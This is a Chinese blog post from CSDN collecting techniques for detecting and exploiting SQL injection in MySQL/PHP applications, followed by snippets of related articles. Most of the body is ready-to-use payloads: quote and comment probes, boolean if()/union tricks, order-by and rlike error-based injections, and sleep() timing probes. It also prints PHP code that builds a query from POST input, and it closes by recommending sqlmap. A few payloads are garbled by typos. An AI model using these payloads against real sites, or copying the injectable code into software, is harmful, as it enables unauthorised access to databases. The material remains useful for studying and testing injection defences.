sql注入mysql判断_SQL注入判断方法总结(持续更新)

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量735 收藏 1
点赞数
文章标签: sql注入mysql判断
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33784667/article/details/113285278
版权

http://e.com/1.php?id=1

http://e.com/1.php?id=1-- sd

http://e.com/1.php?id=aaa

http://e.com/1.php?id=aaa'-- sd

http://e.com/1.php?id=aaa

http://e.com/1.php?id=aaa' '

http://e.com/1.php?id=aaa'||'

http://e.com/1.php?id=aaa'%2b'

id=1 and 1=if(1=2,1,(select 1 union select 2))

id=1 and 1=if(1=1,1,(select 1 union select 2))

id=1 order by 1正常

id=1 order by 1, 错误

id=1 order by 1, 1正常

Content-Type: application/json 时:

可以尝试用 \u0027 代替单引号。

orderby 注入:

$con= mysql_connect("localhost","root","123456") or die();

mysql_select_db("burp");

$orderby = $_POST['orderby'];

$order= $_POST['order'];

$sql= "select * from `sql` order by".$orderby." ".$order;

echo $sql;

$res=mysql_query($sql);

echo"
";

echo"";while($rows =@mysql_fetch_array($res,MYSQL_ASSOC)){

echo $rows['new'];

}

echo"";?>

上面的代码 $orderby 和 $order 都存在注入

8eaf15d88ef3ae52d6276b0e9ae10363.png

这里一般遇到order orderby 参数 我一般会这样来测

orderby=id,&order=asc

orderby=id,1&order=asc

b02a09acaad27b5a804e234e6d1c3b51.png

1c4b422928ded3065790255ec56a8d66.png

所以可以这样来进行注入

,if(1=1,1,(select 1 union sleect 2))

,if(1=2,1,(select 1 union sleect 2))

f5a9dbe0abec4774107da41abf539bd8.png

14f762bc4959dfb709fd9ed6c6b608b8.png

然后就可以放进sqlmap 愉快的跑了。

order 参数同上。

下面说另外一种注入方法:

先列2个语句

mysql> select user from mysql.user where user='admin' order by user rlike char(40);

ERROR1139 (42000): Got error 'parentheses not balanced' fromregexp

mysql> select user from mysql.user where user='admin' order by user rlike 1;+-------+

| user |

+-------+

| admin |

+-------+

1 row in set (0.00 sec)

886a8715b3018b9162c29db88f17210e.png

4d5404e28b3271635aa4496bc73916b2.png

所以就可以构造这样的语句

orderby=id&order=rlike if(1=1,1,char(40))

orderby=id&order=rlike if(1=21,1,char(40))

或者 rlike (case when 1=1 then 1 else (select 1 union select 2)end)

1df2d7d6bdf8a89930d9199646207182.png

92f466518a37e985bc046c9ee823a99e.png

跑数据就可以

rlike (case when 1=1 sqlinject then 1 else (select 1 union select 2)end)

最后也可以 使用sleep 来进行判断注入

orderby=sleep(1)&order=asc

b3983b3537ed64b4e19948e6a591e9fa.png

王晓茵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入类型判断
m0_56578216的博客
09-14 1078
第一关注入一个1’,错误回显出下面内容,其中1’是注入的内容,0,1后面的单引号和最前面的单引号是一对,剩下的两个单引号是一对,错误回显出上面内容说明是字符型注入。注入一个id=2-1回显内容依然相同,说明这关的后端代码将2-1先进行算术运算后才接收,所以回显内容无变化,注入一个id=2-1回显内容改变,说明这关的后端代码将2-1当做字符串处理,才改变了回显内容,
Mysql注入之注入点探测
K_essi的博客
07-30 2063
Mysql初级SQL注入总结 作为一个刚刚接触web安全的小白来说经验的总结非常重要今天我就来总结一下SQL注入的内容 注入点的探测:当然我们第一个想到的当然是使用工具去探测,但作为新手我们现在不讲工具,那如何探测呢? 首先我们需要先判断是什么类型的注入点有数字型,字符型,搜索型。我们在探测时也需要按照这个顺序来探测。 下面讲具体操作比如我们遇到了这样一个站点http://xxxx/ind...
SQL注入之如何检测与判断详细过程
01-31
SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前注入点满大街,一个单引号就可以判断出是否存在注入点。但是如今随着各大厂商越来越注重安全,各种过滤,各种waf,将注入隐藏的越来越深。那么作为白帽子,该如何判断是否存在注入! 这里附上我挖bat各大厂商时用的判断注入方法。下一期再分享如何过waf。
sql注入判断技巧
u012080723的专栏
12-01 571
对于数值型: 1.常用的一条time based盲注语句:     http://www.xxx.com/index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109)) 这条语句是猜解user()第二个字符的ascii码是不是109,若是109,则页面加载将延迟。它: 1) 既没有用到逗号、大小于符号 2) 也没有使用空格 却可以
SQL注入常见类型及注入点的判断
最新发布
qq_64395221的博客
05-15 872
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入。
注入判断mysql数据库_注入判断数据库类型
weixin_42282699的博客
02-12 329
SQL注入-数据库判断国内的网站用ASP+Access或SQLServer的占70%以上,PHP+MySQL占20%,其他的不足10%。常见的数据库Oracle、MySQL、SQL Server、Access、MSsql、mongodb等关系型数据库通过外键关联来建立表与表之间的关系,非关系型数据库通常指数据以对象的形式存储在数据库中,而对象之间的关系通过每个对象自身的属性来决定.关系型数据库:由...
node-mysql中防止SQL注入方法总结
09-09
在Node.js环境中,使用`node-mysql`库进行数据库操作时,必须采取措施来防范SQL注入。 一、SQL注入的防范方法 1. **使用`escape()`方法**: `node-mysql`提供`escape()`, `connection.escape()`, 和 `pool.escape...
MySQL解决SQL注入的另类方法详解
09-10
MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要探讨一些非传统的、另类的方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中时,...
SQL住入原始脚本_SQL注入python脚本_
10-03
它支持多种数据库类型,包括MySQL、PostgreSQL、Oracle等,并且可以执行各种类型的SQL注入攻击。在提供的压缩文件中,`less14_exp.py`, `less9_exp.py`, `less6_exp.py`很可能是SQLmap的示例脚本或插件,分别对应...
MySQL 及 SQL 注入与防范方法
12-15
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对...
MySQL 及 SQL 注入
12-16
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到...
SQL注入判断及注入方式
热门推荐
HMX404的博客
09-20 1万+
SQL注入类型 一,判断注入点 当参数可控时,看参数是否对数据产生影响,若有影响则可能是注入点。 输入SQL看是否可以产生报错,通过报错信息得到数据库部分语句。 利用引号、双引号、圆括号进行报对。 二,注入方式 get注入 在get传参时写入参数,将SQl语句闭合,后面加写入自己的SQL语句。 ?id=1‘order by 3 #判断有几列利用排序报错,超出列数报错。 ?id=1' union select 111,222,333 #显示回显点。 ?id=1' union select 111,us
mysql注入查询sql版本_sql注入时数据库的判断
weixin_30767257的博客
02-07 766
0x01、常见的数据库Oracle:1521、MySQL:3306、SQL Server:1433、Access、MSsql、mongodb、DB20x02、判断sql注入数据库类型方法1.是否可以使用特定的函数来判断,该数据库特有的2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等3.是否可以编码查询4.是否显可以利用错信息5.是否存在数据库某些特性辅助判断0x03、基于特定函数的判...
SQL注入类型判断全网最简单方法(原理解剖)
qq_59468567的博客
02-22 2958
在sql的语法中,有两个类型的变量比较特殊,分别是整型和字符型:1.整型。
Parentheses
spnooyseed的博客
09-02 369
Parentheses Input: Standard Input Time Limit: See AtCoder Dave loves strings consisting only of (’ and)’. Especially, he is interested in balanced strings. Any balanced strings can be constructed usin...
sql注入基础-如何判断 Sql 注入点+实例说明
m0_60884805的博客
10-11 6891
可能存在注入的url形式:http://xxx.xxx.xxx/abcd.php?id=XXX判断sql注入:1.判断此url是否存在sql注入2.若存在sql注入,属于那种? 数字型判断: 可以使用经典的 and 1=1 和 and 1=2 来判断. url中输入?id=1 and 1=1 页面依旧正常运行,继续下一步. url中输入?id=1 and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。
SQL注入-02】SQL注入点的简单判断
m0_64378913的博客
04-24 8048
目录实验环境准备工作SQL 注入点的判断1 背景2 判断方法2.2 分析过程3 引号闭合4 总结 实验环境 实验靶场——虚拟机(IP为172.16.1.1):本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站,win2008及phpstudy的安装过程可以参考《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,网站的搭建过程可以参考《【(SQL+HTML+PHP)综合】一个简单论坛网站的综合开发案例》 注入工具——真实机:本实验利用火狐浏览器来实现union
SQL漏洞-SQL注入实战-SQL注入判断
m0_52701599的博客
01-23 2014
SQL注入漏洞之SQL注入漏洞判断
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4916
sql注入详解
SQL注入基础和进阶.pdf
12-26
"该资源主要介绍了SQL注入的基本概念、原理、判断方法以及针对数字型和字符型SQL注入的攻击方式。" 在网络安全领域,SQL注入是一种常见的攻击手段,它利用了Web应用程序对用户输入数据的验证不足,使得攻击者能够...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值